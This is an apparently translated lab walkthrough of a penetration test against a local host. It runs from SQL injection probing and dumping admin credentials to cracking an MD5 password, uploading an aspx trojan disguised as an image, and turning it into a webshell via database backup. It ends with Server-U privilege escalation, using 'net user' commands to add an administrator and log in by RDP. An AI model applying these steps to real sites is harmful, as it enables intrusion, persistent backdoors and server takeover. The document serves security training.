Principle of sql injection:
penetration testing process:
- When uploading files, if the server-side scripting language does not strictly verify and filter the uploaded files, it is easy to create a situation where any file can be uploaded, thereby controlling the entire website and even the server. This malicious file (php, asp, aspx, jsp, etc.) is also called WebShell.
- WebShell is a command execution environment in the form of web files such as asp, PHP, jsp, or cgi. It can also be called a web backdoor.
- After attacking a website, the attacker usually mixes these asp or php backdoor files with normal webpage files in the web directory of the website server, and then uses a browser to access these backdoors to obtain a command execution environment to control the website The purpose of the server. (You can upload, download or modify files, operate the database, execute arbitrary commands, etc.).
- Privilege escalation is the promotion of current privileges. In layman's terms, when you get the Webshell (site control authority), you want to further gain greater authority, that is, the system control authority.
Experimental steps
Check the security of the website
Open the link "http://192.168.1.3/see.asp?ID=461&titleID=86", add a 'at the end, and find that the page reports an error, as shown in the figure below.
As can be seen from the above figure, after we input', we will directly prompt the database error interface. The first reaction is that the website has an injection vulnerability. Enter http: //192.168.1.3/see.asp?ID=461&titleID=86and 1=1, as shown below Shown:
We enter http://192.168.1.3/see.asp?ID=461&titleID=86and 1=2 on the website, and return to the error interface. Generally speaking, when we enter and 1=1 and and 1= at the end of the website 2 When the returned page is different, and there is a database error, we usually think that the website must have an sql vulnerability, as shown in the following figure:
Use injection tool to crack administrator user and password
Open the "Ah D injection tool", copy the URL with the injection point to the tool, select SQL injection detection on the left, click detection, if the website has injection, there will be a prompt below the tool, and prompt the database type of the website, At this time, select "Detection Table Segment" to detect the names of all table segments in the database, as shown in the following figure:
Select the "admin" segment, and then start to select "Detection Fields". The reason for choosing the admin table segment here is basically all management The user name and password of the member are stored in the admin table segment, as shown in the following figure:
This is to select password and amdin, and then select "Detect content" to crack the user name and password of the other party, as shown in the figure below, so far the user name and password of the website have been cracked .
Use tools to crack MD5 password
The administrator password we get is encrypted by the MD5 value and can be cracked by the tool MD5crack. This tool is to crack the md5 value in the form of a dictionary. As shown in the figure below, enter the MD5 value obtained in the tool, and the software will The plaintext password is automatically cracked. At this point, we get the plaintext of the website management password: 123456
Find and log in to the website management background
After getting the administrator’s user name and password in plain text, we now need to enter the background. We can use the scanning software Yujian background scanning tool to detect the website management background. After we open it, put the website that needs to be detected into the tool and click to start scanning, as follows As shown in the figure,
scanning can basically determine that the background address is http://192.168.1.3/admin/login.asp.
Open the background, as shown in the following figure:
Enter the administrator user name linhai and password 123456 that have been cracked, and the successful east road background, as shown in the following figure:
Get the website webshell
Now that we have entered the management background, in order to maintain the persistence of the website permissions, we need to get the webshell, open the "article management", and open the picture upload, as shown in the following figure:
we upload the asp Trojan, the result is shown in the following figure:
we Change the suffix of the Trojan horse, the original name of the Trojan horse is mm.aspx, changed to mm.jpg, and then upload, you can upload successfully, as shown in the following figure: After
we upload successfully, right-click the photo properties to view his uploaded location, record Down, as shown in the following figure: After the
upload is successful, you can rename the script file by backing up the data so that it can be executed as a Trojan horse script. We open the "Data Management" operation item on the left side of the website and select "Backup/Restore" database".
In the backup database, after the database path, fill in the address of the picture you just uploaded, and then fill in "…/db/1.aspx" after the backup database path, and back up to an aspx file, so that our Trojan can run normally, as shown in the figure. Indication: After
clicking backup, accessing http://192.168.1.3/db/1.aspx is the address of the Trojan horse. The password of the Trojan horse is 77169. We will get the webshell of this website, as shown in the figure:
Get server permissions
After entering the webshell, because you need to execute the dos command to add an administrator, click the "command line" button at the top of the webshell to enter the command execution mode, as shown below, try to enter the whoami command, and the network service permission is displayed. The administrator account cannot be added directly, and the response is blank, which proves that the user cannot be added.
Click the "Port Scan" -> "Scan" button, and found that the target system has open port 43958, which is the server-u service, as shown in the figure:
click "su to raise rights", enter the command "net user aaa 123456" in cmdshell /add", then click the execute button, as shown in the figure:
enter the command in cmdshell, "net localgroup administrators aaa /add", and then click the "execute" button, as shown in the figure:
enter "net user" in cmdshell and then click "Run" button to view the user add aaa successful, as shown:
enter the command "net user aaa" in cmdshell, then click the "Run" button to view the user input aaa administrators user group, as shown:
single Click "Start" -> "Run" -> "mstsc" -> "192.168.1.3", enter the account "123456", and click the login "button", as shown in the figure:
